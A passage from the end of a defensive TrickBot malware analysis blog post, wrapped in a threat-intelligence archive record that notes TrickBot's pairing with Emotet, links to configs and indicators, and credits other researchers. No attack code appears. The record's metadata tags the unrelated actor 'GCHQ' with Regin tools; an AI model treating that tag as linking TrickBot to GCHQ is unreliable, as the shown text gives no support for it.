Obviously further analysis on\nnetwork traffic and stepping through the unpacking of the malware will recover any missed bits of information,\nbut that requires reverse engineer lv.2 🥇🥇\nTRICKBOT can be a real pain and while doing this research it was even in the US news - taking a school offline.\nIf you do detect a TRICKBOT infection in your environment, the likelihood is you have an EMOTET\nproblem too - so one to be aware of and check that out.\nTrickbot normally has its own malspam-based distribution channel, but now Trickbot attackers are also\nusing Emotet for their infections.\nhttps://unit42.paloaltonetworks.com/unit42-malware-team-malspam-pushing-emotet-trickbot/\n2019-05-16 - #Emotet still doing #Trickbot as the follow-up malware this week, it seems.\npic.twitter.com/Ozay0p1MhS\n— Brad (@malware_traffic) May 16, 2019\nWith the rate of modules being developed by TRICKBOT, understanding the impact it can have on your\nenvironment is key for defense. Hopefully this helped you understand the threat TRICKBOT poses and has\nspurred you on to look in these various areas to proactively harden what 'TRICK' is looking for to ultimately steal.\nWith the added 'access-as-a-service' which criminal groups are providing nowadays, your TRICK infection might\nturn into something else. TBC 🙈🙈🙈\nConfigs/IOCs\r\nhttps://pastebin.com/wZ3R0gCa\r\nhttps://pastebin.com/ghGtMBLH\r\nFurther Analysis:\r\nNetwork lateral movement analysis (SMB/IPC/EternalBlue/Champion)\r\nCreate a script to loop through the modules, decode, complete string analysis and automatically report back\r\ndiffs.\r\nNetwork IOCs / PCAP traffic of infection - @malware_traffic does a great job of this already.\r\nLate to the game with this but this looks gold! 
Unpacking the main config, Open Analysis Live -\r\nhttps://www.youtube.com/watch?v=EdchPEHnohw\r\nHappy to hear any further information I've missed or that is key for defenders 😎.\r\nCredits:\r\n@hasherezade's great YouTube content as well as the decrypting scripts used 👏👏👏\r\nMS-ISAC TRICKBOT Primer March 2019 https://www.cisecurity.org/wp-content/uploads/2019/03/MS-ISAC-Security-Primer-Trickbot-11March2019-mtw.pdf\r\n@malware_traffic 2019-04-27 TRICKBOT SAMPLE\r\n@VK_intel for his blog - https://www.vkremez.com/2017/09/lets-learn-reversing-trickbot-banking.html\r\n@felixw3000's analysis https://www.uperesia.com/how-trickbot-tricks-its-victims\r\nSource: https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/"
	],
	"report_names": [
		"trickbot-analysis"
	],
	"threat_actors": [
		{
			"id": "5d2bd376-fcdc-4c6a-bc2c-17ebbb5b81a4",
			"created_at": "2022-10-25T16:07:23.667223Z",
			"updated_at": "2026-04-10T02:00:04.705778Z",
			"deleted_at": null,
			"main_name": "GCHQ",
			"aliases": [
				"Government Communications Headquarters",
				"Operation Socialist"
			],
			"source_name": "ETDA:GCHQ",
			"tools": [
				"Prax",
				"Regin",
				"WarriorPride"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434620,
	"ts_updated_at": 1775791418,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6321d907e9bd2d117363b0075415a26d8f449c97.pdf",
		"text": "https://archive.orkl.eu/6321d907e9bd2d117363b0075415a26d8f449c97.txt",
		"img": "https://archive.orkl.eu/6321d907e9bd2d117363b0075415a26d8f449c97.jpg"
	}
}